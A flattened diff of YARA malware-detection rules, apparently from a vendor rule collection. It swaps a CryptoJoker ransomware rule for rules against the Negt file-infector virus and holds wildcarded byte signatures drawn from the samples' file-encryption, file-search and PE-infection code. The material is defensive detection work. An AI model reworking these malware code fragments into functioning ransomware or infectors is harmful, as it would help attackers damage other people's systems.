?? 8B 45 - ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 - D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? - 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 - 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55 - ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B - 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 - ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? - 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ?? - DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 - 7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC - } - $encrypt_files_p2 = { - 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF - D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ?? - ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ?? - ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? - ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? - ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1 - ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 - 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 - 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B - 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 - ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? - ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 - 7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 - 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 - } - $encrypt_files_p3 = { - 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC - ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? - A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39 - 45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? - 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? - 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ?? - 19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? - ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 - 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? - ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 - } - $find_files_p1 = { - 55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 - ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 - E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 - 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? - 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F - 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ?? - ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? - 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 - E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? - ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 - } - $find_files_p2 = { - E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? - 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 - ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D - 50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? - C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 - } - $find_files_p3 = { - 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 - 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 - C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B - 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 - 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 - ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB - ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? - 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 - 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 + $awfull_body = { + 60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256] + 33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02 + 5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA + EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ?? + [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ?? + 56 5F AC F6 D0 AA 49 E3 02 EB F7 } condition: - uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($awfull_body at pe.entry_point) } -rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects CryptoJoker ransomware." + description = "Yara rule that detects Negt virus." author = "ReversingLabs" - id = "50a9280b-a352-5a2b-acee-5690e509dfd7" + id = "80e83105-dd98-5fad-9119-f851ec3199af" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Negt.yara#L3-L94" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CryptoJoker" + tc_detection_type = "Virus" + tc_detection_name = "Negt" tc_detection_factor = 5 importance = 25 strings: - $call_encrypt = { - 2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A - } - $encrypt_files = { - 2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ?? - 16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ?? - ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 - 20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? - ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? - ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? - 26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04 - 13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ?? - ?? 00 DC 00 11 05 2A + $negt_body_and_infector_1 = { + 6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00 + 3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8 + FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE + FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? + ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ?? + 56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D + 85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 + 50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00 + 00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D } - $start_process = { - 2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ?? - 38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? - 0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ?? - 11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 - ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ?? - 28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38 - ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ?? - 20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ?? - ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ?? - 26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? - 26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ?? - ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ?? - ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ?? - ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A + $negt_body_and_infector_2 = { + EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15 + 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85 + EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF + FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF + FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75 + 08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A + 04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68 + ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68 + ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ?? + ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ?? + 03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7 } - $msgbox_timer = { - 00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C - 00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01 - 13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B - ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ?? - ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B - ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? - ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ?? - ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11 - 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 - 11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04 - 2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? - 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B - ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? - ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? - ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? - ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? - ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? - 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? - ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ?? - ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 - 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A + $negt_body_and_infector_3 = { + 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7 + 05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ?? + ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04 + 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 + 00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00 + E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ?? + ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00 + A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03 + 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 + CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8 + BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? 